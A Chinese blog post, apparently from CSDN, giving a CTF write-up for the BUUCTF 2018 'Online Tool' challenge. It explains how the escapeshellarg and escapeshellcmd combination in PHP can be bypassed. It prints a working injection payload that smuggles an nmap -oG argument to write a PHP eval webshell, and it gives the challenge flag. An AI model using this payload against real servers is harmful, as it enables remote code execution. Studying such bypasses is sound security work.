escapeshellarg 和 escapeshellcmd 绕过之[BUUCTF 2018]Online Tool

最新推荐文章于 2023-12-14 10:28:47 发布
最新推荐文章于 2023-12-14 10:28:47 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: CTF知识点 文章标签: 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/125672247
版权

知识点:

escapeshellarg 和 escapeshellcmd 绕过

nmap -oG 参数,将结果和命令写入到文件

详细:参考谈谈escapeshellarg参数绕过和注入的问题

escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数

功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)

我的理解就是,经过该函数就会对单引号转义:例如:

1'  经过该函数之后就会变为 '1'\'''(可以在线PHP演示)

escapeshellcmd — shell 元字符转义

功能:escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。

反斜线(\)会在以下字符之前插入: &#;`|\?~<>^()[]{}$*, \x0A 和 \xFF*。 *’ 和  仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。

我的理解:

会加 \ ,在&#;`|\?~<>^()[]{}$*, \x0A 和 \xFF*的前面加。而*' " 只有在不被配对的情况下加\

例如:

'1' \'''    转化为 :'1'\\''\' 

结果先经过escapeshellarg再经过escapeshellcmd 之后就会多出来一个'

通过构造就可以把这个' 去掉,导致它是一个命令而不是字符串;

在这道题中,结合system()函数里面执行nmap,只要把host处理一下就行;

首先host会被 ' ' 包裹。构造一句话 

' <?php eval($_POST[1]) ?> -oG shell.php '

这里要注意,后面的php要有空格;

蚂蚁连接就OK, 

flag{b596539b-8bef-4e41-a7b5-5cce61262483}

一只Traveler
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php escapeshellcmd,利用/绕过 PHP escapeshellarg/escapeshellcmd函数
weixin_42138703的博客
03-11 2535
escapeshellargescapeshellcmd的功能escapeshellarg1.确保用户只传递一个参数给命令2.用户不能指定更多的参数一个3.用户不能执行不同的命令escapeshellcmd1.确保用户只执行一个命令2.用户可以指定不限数量的参数3.用户不能执行不同的命令让我们用groups去打印组里每个username成员$username = 'myuser';system(...
php使用escapeshellarg时中文被过滤的解决方法
10-21
主要介绍了php使用escapeshellarg时中文被过滤的解决方法,测试后发现问题的原因是shell和apache php-cgi的运行环境不同引起的,需要的朋友可以参考下
PHP escapeshellarg()+escapeshellcmd()绕过
rev1ve的博客
12-08 2487
这样的流程来处理输入是存在隐患的,mail就是个很好的例子,因为它函数内部使用了escapeshellcmd,如果开发人员仅用escapeshellarg来处理输入再传给mail那这层防御几乎是可以忽略的。如果可以注入参数,那利用就是各种各样的了,例如 PHPMailer 和 RoundCube 中的mail和 Naigos Core 中的 curl都是很好的参数注入的例子。当进行escapeshellarg()函数处理后,会先进行字符转义,变成如下。那么我们在传入参数的前面添加单引号,后面空格加单引号。
escapeshellarg参数绕过和注入的问题
最新发布
m0_75178803的博客
12-14 1374
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回。用空格替换了百分号、感叹号(延迟变量替换)和双引号,并在字符串两边加上双引号。在windows系统中,system函数直接在控制台调用一个command命令。参数,命令执行后的返回状态会被写入到此变量。参数, 那么会用命令执行的输出填充此数组。)都会被一个额外的反斜线所转义。
CTF中一些绕过
qq_41996851的博客
04-23 2435
PHP 主要体现在序列化中; php中的类会有构造函数和析构函数,也还有内置的一些其他语言没有的函数: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; // 构造函数,声明对象时触发 public function __construct($username,$password){
escapeshellarg绕过与参数注入漏洞
Galaxy_0的博客
02-15 260
escapeshellarg绕过与参数注入漏洞
PHP安全技术之 实现php基本安全
10-28
如果必须使用,确保对变量进行严格的安全检查,并使用escapeshellargescapeshellcmd进行预处理。 6. **定制会话管理**:修改默认的会话存储路径或使用数据库来存储会话数据,以提高会话安全性和防止会话劫持。 7...
php代码审计之命令注入(3)
01-09
- 使用 `escapeshellarg()` 和 `escapeshellcmd()` 对用户输入进行转义。 - 避免使用 `system()`, `exec()`, `shell_exec()`, `passthru()` 等函数,除非绝对必要,并且已经采取了充分的安全措施。 - 定期进行代码...
浅谈CTF中escapeshellarg的利用
读万卷书,行万里路。
08-09 5285
浅谈 escapeshellarg 的利用 文章目录浅谈 escapeshellarg 的利用0 前言1 参数注入2 逃逸字符2.1 cat flag2.2 freepoint3 总结 0 前言 escapeshellarg 的作用是把字符串转码为可以在 shell 命令里使用的参数。(escapeshellargescapeshellcmd 相似,主要看是否有引号) 在 CTF 可能被用于: 参数注入(开发人员错误的使用 escapeshellarg 函数) 逃逸字符(该函数非二进制安全) 1
『PHP内核』PHP 7 escapeshellcmd底层探究
Ho1aAs‘s Blog
10-19 1001
文章目录escapeshellcmd描述勘误静态调试PHP_FUNCTION(escapeshellcmd)PHPAPI zend_string *php_escape_shell_cmd(char *str)跳过多字节字符对有效字符转义检查结果有效性并返回动态调试常规输入输入多字节字符完 escapeshellcmd描述 escapeshellcmd归于程序执行类函数,对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 escapeshellcmd(string $command): st
[Web 安全]命令执行漏洞
weixin_46181386的博客
01-16 328
命令执行漏洞
buuctf(探险2)
qq_62046696的博客
08-08 873
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
PHP - 函数绕过 - escapeshell[arg|cmd]()
3569
11-30 2947
https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapeshellcmd 1.确保用户只执行一个命令 2.用户可以指定不限数量的参数 3.用户不能执行不同的...
[BUUCTF 2018]Online Tool (escapeshellargescapeshellcmd双写利用)
qq_44749590的博客
05-18 584
BUUCTF 2018 Online Tool PHP escapeshellarg()+escapeshellcmd()
day5-escapeshellargescapeshellcmd使用不当
qq_45951598的博客
01-09 2297
文章目录Day 5 - postcardescapeshellcmd()函数escapeshellarg()函数小案列总结: Day 5 - postcard escapeshellcmd()函数 escapeshellarg()函数 escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 小案列 可见两个函数配合使用就会导致多个参数的注入。 1、传入的参数是:172.17.0.2’ -v -d a=1 2、经过escapeshellarg处理后变成了’172.17.
php escapeshellcmd,从escapeshellcmd bypass说起到宽字节注入
weixin_42500195的博客
03-11 520
1 php 多字节绕过escapeshellcmdescapeshellcmd()对shell元字符过滤加反斜杠;反斜线(\)会在以下字符之前插入: #&;`|*?~<>^()[]{}$, \x0A 和 \xFF,但在php5.2.5及之前存在通过输入多字节绕过escapeshellcmd的问题。5.2.6 已经修复了该问题。执行 escapeshellcmd("echo "....
buuctf刷题 4(php&Rce&escapeshellarg cmd组合漏洞)
weixin_63231007的博客
05-05 1560
[MRCTF2020]Ez_bypass 1 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&
escapeshellarg
03-16
escapeshellarg是一个PHP函数,用于将字符串转义为安全的shell参数。它可以确保字符串中的特殊字符不会被shell解释为命令或选项。这个函数通常用于构建shell命令行参数,以避免命令注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值